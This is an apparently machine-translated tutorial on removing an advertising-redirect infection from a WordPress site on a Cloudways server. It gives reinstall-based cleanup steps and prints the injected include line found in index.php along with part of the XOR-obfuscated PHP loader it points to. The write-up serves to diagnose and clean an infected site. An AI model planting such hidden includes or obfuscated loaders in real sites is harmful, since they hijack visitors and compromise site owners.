How to clean up viruses in websites on CloudWays

Today, I met a customer's website, which uses Cloudways server. The WordPress website built will automatically jump to a third-party advertising website when the mobile phone accesses it, which is an obvious symptom of virus infection. This article records how to clean up the advertisement jump virus.

It is similar to the principle of the advertisement jump virus encountered before. It is through the vulnerability of the plug-in or WordPress itself that the virus file is uploaded to the server. For example, under the index.php file, we found this string of encrypted code.

 <? php /*85ba2*/ @include ("/hom\x65/10579**.cloudwaysapps.com/zmwjzu\x65gcg/public_html/wp\x2dinclud\x65s/blocks/sit\x65\x2dtitl\x65/.c963cc\x65\x65.oti"); /*85ba2*/

The file points to a file named. c963ccee.oti, which contains the following contents:

 <? php $om12efh = pack('H*', '0a0041131e05535551575008'); $ ozsfhl = 'xa6fli70284m'; $ozsfhl = $ozsfhl ^ $om12efh; $o8dk17mz = ""; $o8dk17mz .= $ ozsfhl("G%05%19%1E%12%07%06%03%0C%40%0A%10A%09%10MDV%02%0E%3A%06A%01%00%0CV%17fUA%06%02%11%00%0EH%5D%40%24%183RV%05%0A%0B%00%06H%07%1D%5C%06X%5Bl%00%0C%0B%11K%17%006M%11%5CWG%06CBI%0E%5E"); $o8dk17mz .= $ ozsfhl("%5DR%24%23PXZ%3C%10%00%11%06H%11%1B%5C%0CKi_%0C%04BI%0E%21%21%25bJ%02vZ%0D%0A%3A%16K%1B%5CNB%0C%5EiV%11%11%0A%17%5DHXI%1EJ%02vZ%0D%0A%3A%16K%1B%5CNC%02AiV%1B%06%06%10");

The code is too long to decrypt completely. However, according to my father's experience, we all know that this is a virus file without decryption. Normal WordPress program files are open source, and encrypted code will not appear.

In addition to this, there are other interference files under the folder, which will not be listed here.

The infection method is analyzed and the solution is very simple. It is to delete the virus file and replace it with a normal file.

The easiest way is to delete all WordPress files and reinstall them. Of course, the files under uploads should be kept manually, or you will lose all the images of the website after reinstallation.

Cloudways is a managed VPS, so the user's permission is not the highest. You don't have permission to delete virus files using sftp or ssh, so you need to contact customer service here.

Finally, the post poisoning processing steps of the website on Cloudways:

1. Back up a poisoned website data for backup;
2. Delete all files and folders except the wp content/uploads folder (you need to contact the customer service to delete them for you, or the permission is insufficient)
3. Re download the WordPress installation package and install the WordPress website;
4. Reinstall the previous themes and plug-ins.

After this operation, the virus file will disappear. If you can't fix it, you can Pay and ask the father to deal with it 。